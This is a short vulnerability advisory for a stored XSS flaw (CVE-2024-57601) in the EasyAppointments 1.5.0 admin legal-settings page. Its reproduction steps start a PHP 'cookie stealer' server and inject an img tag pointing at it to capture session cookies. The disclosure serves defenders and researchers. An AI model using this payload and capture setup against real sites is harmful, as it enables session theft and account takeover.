EasyAppointments 1.5.0 | Stored XSS leads to account takeover
Information
| Software Type | Web App |
|---|---|
| Software Name | EasyAppointments |
| Affected Version | 1.5.0 |
| Software Vendor | Alex Tselegidis |
| Software Link | https://github.com/alextselegidis/easyappointments |
| Severity | Medium |
| CVSS Score | 6.6 |
| CVE Link | https://www.cve.org/CVERecord?id=CVE-2024-57601 |
| Affected Assets | 1293+ |
| Date of Discovery | Dec 22nd, 2024 |
| PoC Exploit | https://gist.github.com/0xHamy/b2674eeffd1f73af96d29f152c47bcbd |
Description
The [/index.php/legal_settings] endpoint has three fields where you can insert custom policies such as cookie policy.
The problem is that the code you write here is executed whenever the page loads, most editors only run the code when it's displayed not when it's being modified but regardless this opens the website to XSS attacks.
Reproduce
To setup a cookie stealer server, you can save the following PHP script as capture.php:
https://gist.github.com/0xHamy/b2674eeffd1f73af96d29f152c47bcbd
Start a PHP server to serve it:$ php -S 0.0.0.0:1718
Login to the admin panel
Go to /index.php/legal_settings
Inside cookies field, click on embed code option of the text editor
Insert the following:
<img src="http://127.0.0.1:1718/capture.php">
This will capture cookies every time you visit legal settings page.
Proof of Concept (PoC) Video
Posted on: January 11, 2025 12:06 AM